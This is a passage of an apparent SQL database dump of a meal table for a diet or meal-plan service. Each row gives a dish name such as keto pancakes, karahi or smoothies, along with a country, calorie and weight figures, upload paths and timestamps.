kiev','/tmp/phpVuPfSZ',NULL,1,NULL,NULL,'','517.75','280','0',1,NULL,'2020-09-11 12:36:40','2021-12-28 11:19:52',5,2),(165,'CHICKEN NIHARI WITH TORTILLA','/tmp/phpohuoQ5',NULL,1,NULL,NULL,'','449.7','205','387',1,NULL,'2020-09-24 00:22:29','2021-12-20 21:31:18',4,1),(166,'Yellow Lentils with peas rice','','Pakistan',1,NULL,NULL,'','408.1707070707','250','0',1,NULL,'2020-10-18 13:12:13','2022-08-29 00:47:38',4,1),(167,'Mix Vegetable Tikka Karahi with wrap','/tmp/phpKDzN2I',NULL,1,NULL,NULL,'','425.62','373','346',1,NULL,'2020-10-18 13:34:02','2021-12-20 21:55:15',4,1),(168,'Mexican Steak with Mushroom Red Sauce','/tmp/phpVXdXpV',NULL,1,NULL,NULL,'','369.52','291','340',1,NULL,'2020-10-18 14:25:11','2023-03-14 23:06:22',1,1),(169,'Mongolian Beef with garlic rice','/tmp/phpudzG4b',NULL,1,NULL,NULL,'','557.63','284','344',1,NULL,'2020-11-25 12:26:35','2021-12-20 21:33:43',4,1),(170,'keto','',NULL,1,NULL,NULL,'0','0','0','0',1,'2020-11-25 12:42:28','2020-11-25 12:33:24','2020-11-25 12:42:28',4,1),(171,'Kung Pao Chicken','/tmp/phpJYRhwY',NULL,1,NULL,NULL,'','490.6','275','370',1,NULL,'2020-11-25 13:34:57','2021-12-22 14:49:31',4,1),(172,'chicken with feta salad','',NULL,1,NULL,NULL,'','348.65','260','0',1,NULL,'2020-11-26 06:04:26','2021-12-22 20:41:18',4,2),(173,'keto chicken egg sup','',NULL,1,NULL,NULL,'','160.35','120','0',1,NULL,'2020-11-26 06:52:07','2021-12-20 20:59:52',4,1),(174,'mayo garlic roll','',NULL,1,NULL,NULL,'','374.49333333333','159','0',1,NULL,'2020-11-26 07:32:28','2021-12-20 21:31:17',4,1),(175,'keto haleem','',NULL,1,NULL,NULL,'','392.17','186','0',1,NULL,'2020-11-26 07:45:52','2021-12-22 21:19:11',4,1),(176,'pan fry chicken','/tmp/phpEoaNVa',NULL,1,NULL,NULL,'','399.8','205','389',1,NULL,'2020-12-12 20:20:47','2022-08-30 01:32:12',4,2),(177,'red beans with minced chicken','',NULL,1,NULL,NULL,'','342','225','0',1,NULL,'2020-12-25 21:10:02','2021-12-20 21:31:17',4,1),(178,'keto grilled chicken salad','',NULL,1,NULL,NULL,'','227.3','198','0',1,NULL,'2021-02-14 23:52:09','2021-12-22 20:41:18',4,1),(179,'ketolishy steak','/tmp/phpsV5jU8',NULL,1,NULL,NULL,'','346.64','196','543',1,NULL,'2021-03-11 18:45:44','2022-01-17 10:50:26',4,2),(180,'sharmula chicken tikka','/tmp/phpgcs5CM',NULL,1,NULL,NULL,'','500.72','246','545',1,NULL,'2021-03-11 18:53:19','2022-01-17 10:51:28',4,2),(181,'Out let Mexican Steak With Mushroom Red Sauce','',NULL,1,NULL,NULL,'','507.95','405','0',1,NULL,'2021-03-11 19:25:24','2021-12-20 21:31:18',4,4),(182,'Out let chicken chilli dry with egg fried rice','',NULL,1,NULL,NULL,'','534.15','405','0',1,NULL,'2021-03-11 20:22:31','2021-12-20 21:33:43',4,4),(183,'Chung Thai Chicken with Egg Fried rice','/tmp/phpFjEovj',NULL,1,NULL,NULL,'','480.3','415','622',1,NULL,'2021-03-11 20:36:56','2022-01-19 15:52:27',4,4),(184,'keto strawberry pancake','',NULL,1,NULL,NULL,'','200.55294117647','135','0',1,NULL,'2021-03-11 22:32:16','2021-12-22 21:19:11',4,1),(185,'mango pancake','',NULL,1,NULL,NULL,'','372.2','290','0',1,NULL,'2021-03-11 22:39:39','2021-12-20 20:59:52',4,1),(186,'Chicken Chipotle With Egg Fried Rice','/tmp/phpxx8Aan','American',1,NULL,NULL,'','469.34','321','626',1,NULL,'2021-03-12 19:53:13','2022-04-04 16:47:24',4,4),(187,'Out let moroccan steak','',NULL,1,NULL,NULL,'','524.5','317','0',1,NULL,'2021-03-12 20:57:40','2021-12-20 21:33:44',4,4),(188,'feta coleslaw with bread','',NULL,1,NULL,NULL,'','181.96666666667','130','0',1,NULL,'2021-03-13 20:16:16','2021-12-22 20:41:18',4,1),(189,'grilled chicken salad sandwich','/tmp/phpEOvYI3',NULL,1,NULL,NULL,'','545.95','273','578',1,NULL,'2021-03-15 20:06:28','2022-01-19 11:38:55',4,4),(190,'Pineapple Barbecue Glazed Chicken Drumsticks','',NULL,1,NULL,NULL,'','609.6','310','0',1,NULL,'2021-03-15 21:14:28','2021-12-20 21:31:17',4,1),(191,'Chicken Chowmein','/tmp/phpvZ9zUY',NULL,1,NULL,NULL,'','496.71428571429','355','579',1,NULL,'2021-03-18 19:41:43','2022-01-19 11:40:19',4,4),(192,'Sweet Corn Salad','/tmp/phpYxADZC',NULL,1,NULL,NULL,'','256.09','208','618',1,NULL,'2021-03-18 19:58:53','2022-01-19 15:46:13',4,4),(193,'out let grilled chicken burger','',NULL,1,NULL,NULL,'','635.72857142857','290','0',1,NULL,'2021-03-18 20:36:38','2021-12-20 21:31:17',4,4),(194,'Greek salad','/tmp/phpe8PRKB',NULL,1,NULL,NULL,'','266','271','583',1,NULL,'2021-03-18 20:56:42','2022-01-19 12:02:56',4,4),(195,'creame tikka','',NULL,1,NULL,NULL,'','578.4','325','0',1,NULL,'2021-03-27 22:53:19','2021-12-20 21:31:18',4,1),(196,'Out let keto chicken alfredo','',NULL,1,NULL,NULL,'','718.3','400','0',1,NULL,'2021-03-30 20:12:51','2021-12-28 11:19:51',4,4),(197,'Keto Moroccan Steak','/tmp/phpDese95',NULL,1,NULL,NULL,'','652.2','430','623',1,NULL,'2021-03-30 20:25:57','2022-01-19 15:53:23',4,4),(198,'Avocado egg salad','',NULL,1,NULL,NULL,'','176','230','0',1,NULL,'2021-03-30 22:40:54','2021-12-20 20:59:52',4,4),(199,'fruit chaat','',NULL,1,NULL,NULL,'','239.95','255','0',1,NULL,'2021-04-15 06:49:04','2021-11-18 14:54:15',4,3),(200,'water','',NULL,1,NULL,NULL,'','0','500','0',1,NULL,'2021-06-07 15:40:45','2021-11-18 14:42:37',4,4),(201,'diet drink','',NULL,1,NULL,NULL,'','0','350','0',1,NULL,'2021-06-07 15:41:03','2021-11-18 14:42:37',4,4),(202,'Karahi with chapati','/tmp/phpZuKbmf',NULL,1,NULL,NULL,'','517.38','289','648',1,NULL,'2021-06-11 13:38:34','2023-03-14 00:38:59',4,1),(203,'spaghetti bolognaise with veg','/tmp/phpS0wPf2',NULL,1,NULL,NULL,'','375.92857142857','307','670',1,NULL,'2021-07-24 11:59:00','2022-09-11 21:37:17',4,1),(204,'Grilled chicken burger with jalapeno sauce','',NULL,1,NULL,NULL,'','612.13571428572','282','0',1,NULL,'2021-07-25 13:08:47','2022-03-15 01:07:35',4,1),(205,'oats chilla','',NULL,1,NULL,NULL,'','158.71','139','0',1,NULL,'2021-07-25 13:30:27','2021-12-20 21:31:18',4,1),(206,'Keto Ground Beef Stroganoff','/tmp/phpJvfuDC',NULL,1,NULL,NULL,'','452.8','235','643',1,NULL,'2021-07-25 14:50:50','2022-08-30 01:46:53',4,2),(207,'Chicken Garlic Warp','/tmp/php0KwE1D',NULL,1,NULL,NULL,'','362.86842105263','141','628',1,NULL,'2021-08-16 13:08:36','2022-01-19 16:11:38',4,4),(208,'Tortilla Chicken Vegetable wrap','/tmp/phpyDd5wO',NULL,1,NULL,NULL,'','226.81842105263','111','603',1,NULL,'2021-08-16 17:18:00','2022-01-19 14:45:14',4,4),(209,'vegetable fried rice','',NULL,1,NULL,NULL,'','176.4','195','0',1,NULL,'2021-08-17 18:32:57','2021-12-20 21:33:44',5,4),(210,'Beef Burger','/tmp/phpzDt114',NULL,1,NULL,NULL,'','689.91428571429','295','596',1,NULL,'2021-08-18 16:18:02','2022-01-19 12:42:19',1,4),(211,'Fajita Sandwich','/tmp/phpWvl3qa',NULL,1,NULL,NULL,'','367.5','200','600',1,NULL,'2021-08-19 18:44:04','2022-01-19 14:28:50',5,4),(212,'banana PanCake','',NULL,1,NULL,NULL,'','319.6','260','0',1,NULL,'2021-08-22 13:59:01','2022-03-30 20:45:29',4,4),(213,'dry fruits PanCake','',NULL,1,NULL,NULL,'','356.95','180','0',1,NULL,'2021-08-22 14:04:00','2022-03-30 20:45:29',4,4),(214,'steak and cheese omelette','',NULL,1,NULL,NULL,'','570','340','0',1,NULL,'2021-08-22 14:09:48','2021-12-22 20:36:43',4,4),(215,'breakfast platter','',NULL,1,NULL,NULL,'','395.98888888889','250','0',1,NULL,'2021-08-22 14:47:24','2021-12-20 21:16:13',4,4),(216,'apple jam','',NULL,1,NULL,NULL,'','34.6','35','0',1,NULL,'2021-08-22 14:48:54','2021-11-18 14:42:37',4,4),(217,'steak benedict','',NULL,1,NULL,NULL,'','599.06111111111','275','0',1,NULL,'2021-08-23 15:35:37','2021-12-28 11:19:51',4,4),(218,'chicken egg fried rice','',NULL,1,NULL,NULL,'','283.1','215','0',1,NULL,'2021-08-23 15:47:00','2021-12-20 21:33:44',4,4),(219,'Chicken Garlic Wrap','/tmp/phpDUWzkB',NULL,1,NULL,NULL,'','334.11842105263','151','591',1,NULL,'2021-08-23 15:50:32','2022-01-19 12:39:25',4,4),(220,'Keto Dry Fruits Pancake','/tmp/phpRcHEVk',NULL,1,NULL,NULL,'','317.90588235294','130','633',1,NULL,'2021-08-24 13:35:02','2022-01-21 13:11:03',4,4),(221,'Steak And veggies egg','/tmp/phpodcP5R','American',1,'sauteed meat with seasons and vegs then boiled egg to finished garnish',NULL,'','329.1','225','608',1,NULL,'2021-08-26 20:42:49','2022-01-19 15:23:44',4,1),(222,'Chicken seekh kebab with emili sauce','/tmp/phpZkceen',NULL,1,NULL,NULL,'','391.95','250','658',1,NULL,'2021-08-26 21:20:06','2022-01-27 20:08:31',4,1),(223,'keto chicken kari','',NULL,1,NULL,NULL,'','333.50588235294','175','0',1,NULL,'2021-09-20 16:49:51','2021-12-22 21:19:11',19,2),(224,'Keto Tortilla Chips with cheese sauce','',NULL,1,NULL,NULL,'','244.50588235294','80','0',1,NULL,'2021-09-21 14:29:55','2021-12-22 21:19:11',19,1),(225,'egg ketoslaw wrap','/tmp/phpITGDy8','American',1,NULL,NULL,'','375.99','220','537',1,NULL,'2021-09-23 16:02:45','2022-01-17 10:46:35',19,2),(226,'shami burger','/tmp/php3BGUzz','Pakistan',1,NULL,NULL,'','365.29571428572','243','656',1,NULL,'2021-09-24 13:30:40','2023-03-14 22:49:12',19,1),(227,'Keto Cheesy Bacon Ranch Chicken','/tmp/phpdHRfao',NULL,1,NULL,NULL,'','405.5','210','661',1,NULL,'2021-09-25 16:37:35','2022-01-27 20:12:23',19,2),(228,'Vegetable Sandwich','',NULL,1,NULL,NULL,'','419.02','266','0',1,NULL,'2021-10-06 14:06:17','2021-12-20 21:55:15',19,3),(229,'Vege Yellow Lentils With Peas Rice','',NULL,1,NULL,NULL,'','212.50484848485','203','0',1,NULL,'2021-10-06 14:11:37','2021-12-20 21:31:19',19,3),(230,'dry fruits','',NULL,1,NULL,NULL,'','300.8','60','0',1,NULL,'2021-10-06 14:15:45','2021-11-18 14:54:16',19,3),(231,'Vege Palak Paneer with chapati','',NULL,1,NULL,NULL,'','323.4','208','0',1,NULL,'2021-10-06 15:01:25','2021-12-22 20:41:18',19,3),(232,'shami burger with hummus/','',NULL,1,NULL,NULL,'','259.7','198','0',1,NULL,'2021-10-06 15:14:19','2021-12-20 21:33:44',19,3),(233,'MASHkeDALL with chapati/','',NULL,1,NULL,NULL,'','279.89','131','0',1,NULL,'2021-10-06 15:44:23','2021-12-20 21:31:18',19,3),(234,'peanut butter sandwich','',NULL,1,NULL,NULL,'','390.9','90','0',1,NULL,'2021-10-06 17:24:56','2021-12-28 11:19:51',19,3),(235,'apple salad','',NULL,1,NULL,NULL,'','85.5','200','0',1,NULL,'2021-10-06 17:29:15','2021-11-18 14:54:15',19,3),(236,'MIX vegetable karahi with chapanti','',NULL,1,NULL,NULL,'','254.59','273','0',1,NULL,'2021-10-10 13:16:42','2021-12-20 21:55:15',19,3),(237,'peas garlic rice with potato cutlets','',NULL,1,NULL,NULL,'','293.17','243','0',1,NULL,'2021-10-10 13:22:51','2021-12-20 21:55:15',19,3),(238,'Black Coffee','/tmp/phplfdAE8',NULL,1,NULL,NULL,'','0','5','593',1,NULL,'2021-10-31 18:10:45','2022-01-19 12:40:13',19,4),(239,'Mix Vegetable Koftay with chapati/','',NULL,1,NULL,NULL,'','348.55','235','0',1,NULL,'2021-11-02 13:48:59','2021-12-20 21:55:15',19,3),(240,'vegetables pasta/','',NULL,1,NULL,NULL,'','275.02142857143','175','0',1,NULL,'2021-11-02 13:56:47','2021-12-22 12:56:00',19,3),(241,'Vegetable sub with hummus/','',NULL,1,NULL,NULL,'','417.61428571429','265','0',1,NULL,'2021-11-03 13:36:31','2021-12-20 21:33:44',19,3),(242,'mix vaggie with lady finger and chapati','',NULL,1,NULL,NULL,'','241.5','150','0',1,NULL,'2021-11-03 13:47:57','2021-12-20 21:31:19',19,3),(243,'vegetable chili chowmin','',NULL,1,NULL,NULL,'','249.81428571429','210','0',1,NULL,'2021-11-03 15:04:35','2021-12-22 16:22:47',19,3),(244,'Vegetable wrap with hummus','',NULL,1,NULL,NULL,'','291.7','225','0',1,NULL,'2021-11-05 12:38:20','2021-12-20 21:33:44',19,3),(245,'ridge gourd with chapati','/tmp/php2sFAhI',NULL,1,NULL,NULL,'','280.1','195','531',1,NULL,'2021-11-05 12:43:58','2022-01-06 15:40:14',19,3),(246,'ridge gourd with chapati','',NULL,1,NULL,NULL,'','280.1','195','0',1,NULL,'2021-11-05 12:43:59','2021-12-20 21:31:19',19,1),(247,'ridge gourd with chapati','',NULL,1,NULL,NULL,'','280.1','195','0',1,NULL,'2021-11-05 12:44:08','2021-12-20 21:31:19',19,1),(248,'red beans rice with veggie cutlets','/tmp/php939zPN',NULL,1,NULL,NULL,'','242.3','215','535',1,NULL,'2021-11-05 14:33:17','2022-01-06 15:41:03',19,3),(249,'paneer pizza','/tmp/phpCVcyVp',NULL,1,NULL,NULL,'','443.2','200','519',1,NULL,'2021-11-05 15:07:37','2021-12-22 20:41:18',19,3),(250,'chick peas polao','',NULL,1,NULL,NULL,'','182.7','125','0',1,NULL,'2021-11-05 15:30:53','2021-11-18 14:54:16',19,3),(251,'veg mayo sandwich','',NULL,1,NULL,NULL,'','341.5','170','0',1,NULL,'2021-11-06 14:29:26','2021-12-20 21:16:13',19,3),(252,'Vegan and lentil with chapati','',NULL,1,NULL,NULL,'','233.1','172','0',1,NULL,'2021-11-06 17:03:48','2021-12-20 21:55:15',19,3),(253,'paneer chili dry with veg fried rice','',NULL,1,NULL,NULL,'','200.65','165','0',1,NULL,'2021-11-06 17:21:04','2021-12-22 20:41:18',19,3),(254,'cauliflower with chapati','',NULL,1,NULL,NULL,'','280.7','225','0',1,NULL,'2021-11-06 17:50:13','2021-12-20 21:55:15',19,3),(255,'garlic fired red beans with coriander rice','',NULL,1,NULL,NULL,'','225.22','243','0',1,NULL,'2021-11-08 16:13:56','2022-09-06 19:47:53',19,3),(256,'white kidney beans carry with chapati','',NULL,1,NULL,NULL,'','226.5','160','0',1,NULL,'2021-11-08 16:29:22','2021-12-20 21:31:19',19,3),(257,'smoky eggplant stir fry mash with cumin rice','',NULL,1,NULL,NULL,'','166.22352941176','310','0',1,NULL,'2021-11-08 18:26:44','2021-12-20 21:31:19',19,1),(258,'chicken egg salad wrap','',NULL,1,NULL,NULL,'','402.9','215','0',1,NULL,'2021-11-13 14:35:25','2021-12-20 21:33:44',19,4),(259,'Singaporean rice','/tmp/phpt1fR67',NULL,1,NULL,NULL,'','385.82857142857','262','615',1,NULL,'2021-11-13 15:48:37','2022-01-19 15:37:01',19,4),(260,'keto chicken chapli with creamy tandoori sauce','',NULL,1,NULL,NULL,'','471.45','245','0',1,NULL,'2021-11-16 14:06:04','2021-12-28 11:19:52',19,4),(261,'Cappuccino coffee','/tmp/phpAFglY9',NULL,1,NULL,NULL,'','51','170','589',1,NULL,'2021-11-17 18:48:11','2022-03-30 20:45:29',19,4),(262,'Bbq grilled sandwich','','Ukraine',1,NULL,NULL,'','434.81666666667','187','0',1,NULL,'2021-11-22 21:37:48','2021-12-31 23:19:57',1,1),(263,'shakshuka','','Qatar',1,NULL,NULL,'','192.44','108','0',1,NULL,'2021-11-23 00:51:52','2022-08-29 23:07:14',23,1),(264,'chicken tagine raghoue','','Morocco',1,NULL,NULL,'','373.4','225','0',1,NULL,'2021-11-23 00:58:46','2022-03-07 23:11:30',23,1),(265,'ruzz harissa','','Syria',1,NULL,NULL,'','361.55','275','0',1,NULL,'2021-11-23 01:10:54','2022-02-15 21:16:54',23,1),(266,'baidh khudaar','/tmp/phpOfkqLJ','Saudi Arabia',1,NULL,NULL,'','247.29','147','560',1,NULL,'2021-11-23 23:42:54','2022-01-18 09:23:37',23,1),(267,'chicken Adobo','/tmp/phpRhVspB','Philippines',1,NULL,NULL,'','628.83','306','558',1,NULL,'2021-11-23 23:49:29','2022-01-18 09:23:05',23,1),(268,'chicken paella','/tmp/phpwmDX4R','Spain',1,NULL,NULL,'','372.11','285','562',1,NULL,'2021-11-23 23:52:11','2022-01-18 09:24:37',23,1),(269,'chicken peas stew','/tmp/phpwm4Qqj',NULL,1,NULL,NULL,'','500.68','249','609',1,NULL,'2021-11-24 00:08:29','2022-05-08 21:50:20',23,1),(270,'Stire Fry Chicken','/tmp/phpzbIkMb','China',1,NULL,NULL,'','345.43','255','637',1,NULL,'2021-11-24 00:11:16','2022-01-21 13:13:35',23,1),(271,'chicken Spanish omelet','/tmp/phpq8lbFK','Spain',1,NULL,NULL,'','281.06','146','530',1,NULL,'2021-11-24 00:17:35','2022-01-06 15:39:18',23,1),(272,'Arrabiatta pasta','/tmp/phpG6Zdvo','Italy',1,NULL,NULL,'','377.44714285714','276','534',1,NULL,'2021-11-24 00:22:13','2022-09-13 20:19:38',23,1),(273,'chicken Aakhni with rice','','Pakistan',1,NULL,NULL,'','377.55','259','0',1,NULL,'2021-11-24 00:30:48','2022-08-29 23:38:36',23,1),(274,'Dammari chicken stew','/tmp/phpKZwe7I','Pakistan',1,NULL,NULL,'','419.68','252','638',1,NULL,'2021-11-24 00:39:38','2022-03-30 20:45:29',23,1),(275,'posched basil sandwich','/tmp/phpQeqEiQ','United Kingdom',1,NULL,NULL,'','305.2','175','547',1,NULL,'2021-11-24 00:53:03','2022-09-25 01:01:13',23,1),(276,'roasted herb chicken leg with chop veg','','United Kingdom',1,NULL,NULL,'','447.08','292','0',1,NULL,'2021-11-25 01:20:02','2022-01-27 23:35:28',23,1),(277,'chicken pholoa','','Pakistan',1,NULL,NULL,'','266.25','182','0',1,NULL,'2021-11-26 00:32:13','2022-08-29 20:23:53',23,1),(278,'Chinese Chicken curry with rice','/tmp/phpdVFS3D','China',1,NULL,NULL,'','425.2','232','654',1,NULL,'2021-11-26 00:41:57','2022-01-27 15:27:13',23,1),(279,'asian chicken salad','',NULL,1,NULL,NULL,'','380.83571428571','317','0',1,NULL,'2021-12-03 00:54:45','2023-03-25 09:55:45',23,1),(280,'chicken fattouch','','Syria',1,NULL,NULL,'','310.58','303','0',1,NULL,'2021-12-03 01:05:22','2021-12-20 21:33:44',23,1),(281,'chicken salsa','','Mexico',1,NULL,NULL,'','440.6','342','0',1,NULL,'2021-12-20 20:11:24','2022-01-30 23:32:45',1,1),(282,'Cocktail salad','/tmp/phplqVKRW',NULL,1,NULL,NULL,'','177.18333333333','267','554',1,NULL,'2021-12-20 21:57:42','2022-01-17 20:06:25',1,1),(283,'Shish Tawook','/tmp/phplI6Cnv','Turkey',1,NULL,NULL,'','306.8','195','556',1,NULL,'2021-12-20 22:05:23','2022-01-17 20:08:33',1,1),(284,'Fattouch Salad','/tmp/phpv4hjj9','Syria',1,'crotons bread',NULL,'','165.94','212','650',1,NULL,'2021-12-20 22:19:52','2022-01-27 15:17:14',1,1),(285,'grislow sandwitch','','Albania',1,NULL,NULL,'','428.85','262','0',1,NULL,'2021-12-21 00:57:28','2021-12-21 00:57:48',23,1),(286,'chicken sahan','/tmp/phpzWaguJ','Saudi Arabia',1,NULL,NULL,'','251.55','252','540',1,NULL,'2021-12-21 01:04:26','2022-01-17 10:47:51',23,1),(287,'curry chicken apple salad','/tmp/php5B1iA6','United Kingdom',1,NULL,NULL,'','464.22','293','663',1,NULL,'2021-12-21 01:10:15','2022-09-11 21:00:21',23,1),(288,'Fruit Mahalabiya','/tmp/phpIwpmo3','Egypt',1,NULL,NULL,'','172.47','482','641',1,NULL,'2021-12-21 01:16:27','2022-03-09 23:38:43',23,1),(289,'drumstick with glaze veg','','American',1,NULL,NULL,'','417.12','273','0',1,NULL,'2021-12-21 01:24:07','2021-12-22 16:08:44',23,1),(290,'Coconut Bar','/tmp/phpC1b5kP','American',1,NULL,NULL,'','266.67352941176','90','665',1,NULL,'2021-12-21 21:34:06','2022-01-31 16:00:50',1,1),(291,'Dry snacks','/tmp/phpVcvsga',NULL,1,NULL,NULL,'','126.86','23','612',1,NULL,'2021-12-22 11:54:53','2022-01-19 15:33:58',1,1),(292,'Keto Creamy Garlic Chicken','','Turkey',1,'with chicken stock',NULL,'','481.22','232','0',1,NULL,'2021-12-22 12:41:08','2021-12-27 18:36:25',1,4),(294,'Marinara Chicken pasta','','Italy',1,'chicken queb',NULL,'','405.09571428572','143','0',1,NULL,'2021-12-22 12:55:54','2022-04-06 21:55:19',1,4),(295,'Steak Grilled Cheese Sandwich','/tmp/phpLi7I0p','American',1,'Steak Grilled',NULL,'','526.42','230','601',1,NULL,'2021-12-22 13:03:51','2022-01-19 14:31:19',1,4),(296,'mashroom swiss burger','','American',1,'beef',NULL,'','486.04642857143','202','0',1,NULL,'2021-12-22 13:39:10','2021-12-29 06:22:33',1,4),(297,'Halloumi sandwich','/tmp/phpP1WBHL',NULL,1,NULL,NULL,'','576.91428571429','275','521',1,NULL,'2021-12-23 15:20:31','2021-12-23 15:21:43',19,4),(298,'chicken spinach frittata','','United Kingdom',1,NULL,NULL,'','364.54705882353','199','0',1,NULL,'2021-12-23 23:30:38','2022-08-30 01:24:02',23,2),(299,'chicken with zucchini  lasagna','','American',1,NULL,NULL,'','471','325','0',1,NULL,'2021-12-23 23:48:52','2022-03-31 00:54:37',23,2),(300,'chilli chicken with lettus wrape','','Mexico',1,NULL,NULL,'','388.07','211','0',1,NULL,'2021-12-24 00:01:24','2022-06-18 00:47:44',23,2),(301,'chicken Paprikash','','Hungary',1,NULL,NULL,'','370.54','257','0',1,NULL,'2021-12-24 00:07:53','2021-12-30 00:20:36',23,2),(302,'fried chicken fillet and baby marrow sauteed','','American',1,NULL,NULL,'','471.71470588235','277','0',1,NULL,'2021-12-24 00:34:46','2022-09-11 20:42:57',23,2),(303,'chicken mushroom stew','','Thailand',1,NULL,NULL,'','379.5','170','0',1,NULL,'2021-12-24 01:05:35','2021-12-28 11:19:52',23,2),(304,'grilled chicken sub','',NULL,1,NULL,NULL,'','521.34428571429','288','0',1,NULL,'2021-12-24 13:24:31','2021-12-24 13:24:31',19,4),(305,'keto staff chicken with creamy spinach','',NULL,1,NULL,NULL,'','533.34','293','0',1,NULL,'2021-12-24 13:43:00','2021-12-24 13:43:00',19,4),(306,'keto italian chicken skewers','','Italy',1,'chicken qubes',NULL,'','586.09','169','0',1,NULL,'2021-12-25 06:15:10','2022-03-30 20:45:29',19,4),(307,'cheesy chicken tacos skillet','','Mexico',1,NULL,NULL,'','457.7','258','0',1,NULL,'2021-12-26 21:59:55','2021-12-28 11:19:52',23,2),(308,'beef garlic butter bites','','American',1,NULL,NULL,'','476.94','157','0',1,NULL,'2021-12-26 22:15:09','2022-04-16 07:27:33',23,2),(309,'chicken with cabbage casserole','','France',1,NULL,NULL,'','341.13','228','0',1,NULL,'2021-12-26 22:32:46','2021-12-26 22:39:26',23,2),(310,'chciken tuscan with spinach','','Italy',1,NULL,NULL,'','420.75','215','0',1,NULL,'2021-12-26 22:51:00','2022-03-31 00:55:58',23,2),(311,'chicken cauliflower gratin','','France',1,NULL,NULL,'','500.4','250','0',1,NULL,'2021-12-26 23:00:07','2022-01-19 22:58:47',23,2),(312,'chefs favourite fajita','','Mexico',1,NULL,NULL,'','449.34882352941','253','0',1,NULL,'2021-12-26 23:15:09','2021-12-28 11:19:52',23,2),(313,'Immunity booster smoothie','',NULL,1,NULL,NULL,'','126.7','113','0',1,NULL,'2021-12-27 17:34:52','2021-12-27 17:34:52',28,4),(314,'Immunity booster smoothie','',NULL,1,NULL,NULL,'','128.3','115','0',1,NULL,'2021-12-27 17:40:46','2021-12-27 17:40:46',28,4),(315,'Mighty muscles','',NULL,1,NULL,NULL,'','112.34705882353','135','0',1,NULL,'2021-12-28 14:50:55','2021-12-28 14:50:55',28,4),(316,'The detox drink','',NULL,1,NULL,NULL,'','55.1','120','0',1,NULL,'2021-12-28 14:52:45','2021-12-28 14:52:45',28,4),(317,'Creamy energy smoothie','',NULL,1,NULL,NULL,'','79.98','76','0',1,NULL,'2021-12-28 14:56:19','2021-12-28 14:56:19',28,4),(318,'Breakfast Smoothie','',NULL,1,NULL,NULL,'','155.6','165','0',1,NULL,'2021-12-28 16:06:56','2021-12-28 16:06:56',28,4),(319,'Anti-cholesterol smoothie','',NULL,1,NULL,NULL,'','105.95','55','0',1,NULL,'2021-12-28 16:08:43','2021-12-28 16:08:43',28,4),(320,'Smoky Cheese Beef burger','/tmp/phpOSFBKp','American',1,'beef,. chicken',NULL,'','549.44285714286','226','586',1,NULL,'2021-12-29 06:36:02','2022-01-19 12:33:25',28,4),(321,'HOT DOG','/tmp/phppKPvX7','American',1,'2 hot dog',NULL,'','697.21793650794','248','575',1,NULL,'2021-12-30 07:12:48','2022-01-19 11:00:22',28,4),(322,'Smoky Cheese Chicken burger','/tmp/phpu3DlSW','American',1,NULL,NULL,'','532.33571428572','271','524',1,NULL,'2021-12-31 12:31:05','2021-12-31 12:31:30',1,4),(323,'french toast','','France',1,NULL,NULL,'','363.33393665158','177','0',1,NULL,'2022-01-19 23:03:41','2022-01-19 23:07:31',23,2),(324,'paneer reshmi handi','','Pakistan',1,NULL,NULL,'','432.7','145','0',1,NULL,'2022-01-19 23:17:02','2022-03-31 00:01:22',23,2),(325,'pepper chicken with rice','','Pakistan',1,NULL,NULL,'','416.53','283','0',1,NULL,'2022-01-20 21:54:29','2022-04-07 08:21:15',23,1),(326,'chicken tawaki salad','','Pakistan',1,NULL,NULL,'','384.18','307','0',1,NULL,'2022-01-20 22:26:25','2022-01-20 22:30:08',23,1),(327,'Italian salad','','Italy',1,NULL,NULL,'','199.05857142857','181','0',1,NULL,'2022-01-21 22:34:59','2022-01-21 22:59:37',23,1),(328,'jalapino chicken cheese pop','','American',1,NULL,NULL,'','406.12294117647','199','0',1,NULL,'2022-01-28 00:38:56','2022-01-28 00:40:21',23,2),(329,'DIET CAFE SALAD','','American',1,'CHICKEN',NULL,'','190.83','266','0',1,NULL,'2022-03-21 16:47:52','2022-03-21 16:53:27',19,4),(330,'ITALIAN  SALAD','','Italy',1,NULL,NULL,'','123.24','164','0',1,NULL,'2022-03-21 17:10:12','2022-03-21 17:10:12',19,4),(331,'B.B.Q SANDWICH','','Pakistan',1,'b.b.q',NULL,'','505.38666666667','253','0',1,NULL,'2022-03-21 20:09:46','2022-03-21 20:09:46',19,4),(332,'CHICKEN ALFREDO PASTA','','Pakistan',1,'PASTA',NULL,'','479.26571428572','235','0',1,NULL,'2022-03-22 17:00:13','2022-03-24 15:43:04',28,4),(333,'Arabian Bake puff','','Saudi Arabia',1,NULL,NULL,'','275.05','170','0',1,NULL,'2022-03-22 23:02:54','2023-03-15 00:16:10',23,1),(334,'french twister','','France',1,NULL,NULL,'','341.33846153846','141','0',1,NULL,'2022-03-22 23:11:37','2022-03-30 20:45:29',23,1),(335,'chicken mince burger','','American',1,NULL,NULL,'','314.56214285715','171','0',1,NULL,'2022-03-22 23:20:40','2022-03-22 23:21:27',23,1),(336,'Fruits crunch','',NULL,1,NULL,NULL,'','196.03','421','0',1,NULL,'2022-03-22 23:24:41','2022-03-30 20:45:29',23,1),(337,'fruits drop salad','',NULL,1,NULL,NULL,'','250.1','300','0',1,NULL,'2022-03-22 23:33:22','2022-03-22 23:34:59',23,1),(338,'chicken box patties','',NULL,1,NULL,NULL,'','276.8','263','0',1,NULL,'2022-03-22 23:37:18','2022-03-22 23:40:04',23,1),(339,'chicken with egg noodle','',NULL,1,NULL,NULL,'','278.88','217','0',1,NULL,'2022-03-22 23:41:52','2022-03-22 23:42:28',23,1),(340,'protien chat','','Pakistan',1,NULL,NULL,'','314.62','178','0',1,NULL,'2022-03-22 23:46:29','2022-03-23 00:00:17',23,1),(341,'reshmi kabab','','Pakistan',1,NULL,NULL,'','376.78','267','0',1,NULL,'2022-03-22 23:51:30','2023-04-19 10:08:35',23,1),(342,'chicken cutlet','','Pakistan',1,NULL,NULL,'','453.24285714286','272','0',1,NULL,'2022-03-22 23:55:14','2022-05-01 09:48:36',23,1),(343,'vegetables yogurt chat with dates spicy sauce','',NULL,1,NULL,NULL,'','331.99','226','0',1,NULL,'2022-03-23 00:07:23','2022-03-23 00:08:09',23,1),(344,'KUNG PAO CHICKEN WITH RICE','','American',1,'kung pao chicken',NULL,'','390.68','261','0',1,NULL,'2022-03-24 18:22:32','2022-03-24 20:14:30',19,4),(345,'DRAGON CHICKEN WITH RICE','','China',1,'HEALTHY MEALS',NULL,'','250.13','186','0',1,NULL,'2022-03-24 18:32:40','2022-03-24 20:15:09',19,4),(346,'BLACK PAPPER CHICKEN WITH 